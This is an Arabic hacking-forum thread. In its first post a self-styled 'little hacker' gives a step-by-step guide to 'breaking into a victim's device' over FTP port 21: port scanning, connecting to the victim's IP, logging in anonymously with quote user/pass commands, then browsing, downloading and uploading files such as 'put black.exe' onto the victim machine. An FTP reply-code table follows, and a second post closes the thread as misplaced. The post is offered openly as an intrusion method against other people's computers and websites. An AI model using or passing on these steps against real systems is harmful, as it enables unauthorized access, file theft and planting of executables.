الاختراق عن طريق اف تي بي اختراق كاااااااااااااااااااامل

الاختراق عن طريق اف تي بي اختراق كاااااااااااااااااااامل


النتائج 1 إلى 2 من 2

الموضوع: الاختراق عن طريق اف تي بي اختراق كاااااااااااااااااااامل

  1. #1

    new الاختراق عن طريق اف تي بي اختراق كاااااااااااااااااااامل

    بسم الله الرحمن الرحيم
    انا اخوكم الهكر الصغير الي تعرفوه بس اليوم جايبلكم طريقة وااااااااااااااااااايد ممتازة وسهلة وتعتمد على المهارات الفردية اذا اعجبتك الطريقة فلابد من وضع تعليق مفهوم
    نبدا


    طريقة اختراق جهاز عبر FTP


    أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
    21
    مفتوح و هو البورت الخاص بال FTP
    و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها
    Superscanne
    بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
    إضغط على
    Start
    ثم
    Run
    ثم اكتب
    ftp –n
    سوف تطلع لك نافدة في الدوس مكتوب عليها
    FTP>
    ؤوكي لحد هنا كل شيء تمام
    و بعدين اكتب
    Open
    ثم إضغط على
    إدخال
    Enter
    سوف تتحصل عب النتيجة التالية
    FTP>
    To
    أكتب بجانب
    To
    رقم الإبي للضحية ثم إضغط على إدخال
    و الآن خد بالك معي

    إدا تحصلت على هدا الرد فقد تخطيت خطوة
    Connected to www.assassin.com
    220 websrv1 Microsoft FTP Service (Version 4.0).
    و الآن أكتب الكتابة التالية
    ftp>quote user ftp
    إدا تحصلت على هدا الرد فقد تخطيت خطوة
    331 Anonymous acces allowed, send identify (e-mail name) as password.
    و الآن أكتب الكتابة التالية
    ftp>quote cwd ~root
    إدا تحصلت على هدا الرد فقد تخطيت خطوة
    530 Please login with USER and PASS
    ثم أكتب الكتابة التالية
    ftp>quote pass ftp
    إدا تحصلت على هدا الرد فقد تخطيت خطوة
    و نجحت في الإقتحام

    230 Anonymous user logged in.
    مبروك أنت الآن في جهاز الضحية
    ما عليك الآن الا ان تقوم بإستعمال
    اوامر الفتيبي
    و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إدا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء و لهدا
    قمت بحتضير الاوامر لكي تطبقوها مباشرةا بعد نجاح الإقتحام

    Pwd
    لكي تعر ما يحتويه الهارد ديسك
    Cd
    لإقتحام مجلد مثال
    Cd black
    في هدا المثال قمت بإقتحام مجلد المسمى بلاك
    Ls
    لكي يتضح لك محتوى المجلد أو الهارد ديسك
    ___
    لكي تحمل الى سطح المكتب بتاع جهازك
    مثال
    ___ black.exe
    Put
    العملية العكسية ل
    ___
    يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
    في جهاز الضحية
    مثال
    Put black.exe
    Close
    لقطع الإتصال مع الضحية


    هدي أهم الأوامر و الآن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق الأوام و شرحها و ارقامها


    Codes: Signification:
    110 Restart marker reply.
    120 Service ready in nnn minutes. (nnn est un temps)
    125 Data connection already open; transfer starting.
    150 File status okay; about to open data connection.
    200 Command okay.
    202 Command not implemented, superfluous at this site.
    211 System status, or system help reply.
    212 Directory status.
    213 File status.
    214 Help message.
    215 NAME system type.
    220 Service ready for new user.
    221 Service closing control connection.
    225 Data connection open; no transfer in progress.
    226 Closing data connection.
    227 Entering passive mode (h1, h2, h3, h4, p1, p2).
    230 User logged in, proceed.
    250 Requested file action okay, completed.
    257 "PATHNAME" created.
    331 User name okay, need password.
    332 Need account for login.
    350 Requested file action pendingfurther information.
    421 Service not available, closing control connection.
    425 Can't open data connection.
    426 Connection closed; transfer aborded.
    450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
    451 Requested action aborded: local error processing.
    452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
    500 Syntax error, command unrecognized.
    501 Syntax error in parameters or arguments.
    502 Command not implemented.
    503 Bad sequence of commands.
    504 Command not implemented for that parameter.
    530 Not logged in.
    532 Need account for storing files.
    550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
    551 Requested action aborded: page type unknown.
    552 Requested file action aborded.
    553 Requested action not taken. (Nom de fichier non attribué)




    و الآن أرجو ان اكون قد نجحت في شرح هده الطريقة على فكرة هده الطريقة يمكن ان تستعمل لإقتحام موقع كما تستعمل لإقتحام جهاز

    --------------------------------------------------------------------------------------------
    مع تحيات هكركم الصغير big boss.

  2. #2

    افتراضي رد: الاختراق عن طريق اف تي بي اختراق كاااااااااااااااااااامل

    في القسم الغلط يغلق

    Iam BACK PEOPLE

    Ace 2010-2017

المواضيع المتشابهه

  1. الاختراق عن طريق الدوس 100%
    بواسطة didorahim في المنتدى منتدى الإختراق العام
    مشاركات: 57
    آخر مشاركة: 08-27-2012, 01:00 PM
  2. مقدمة في اختراق الاجهزة عن طريق برامج الاختراق + مصطلحات هامه
    بواسطة ghost28 في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 3
    آخر مشاركة: 10-01-2011, 01:05 AM
  3. مقدمة في اختراق الاجهزة عن طريق برامج الاختراق + مصطلحات هامه
    بواسطة سعودي18بلازا في المنتدى منتدى الإختراق العام
    مشاركات: 2
    آخر مشاركة: 03-23-2011, 12:36 AM
  4. مشاركات: 10
    آخر مشاركة: 03-12-2011, 07:40 AM
  5. الاختراق عن طريق الشيل كود
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم اختراق الأجهزة
    مشاركات: 6
    آخر مشاركة: 02-02-2011, 11:26 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •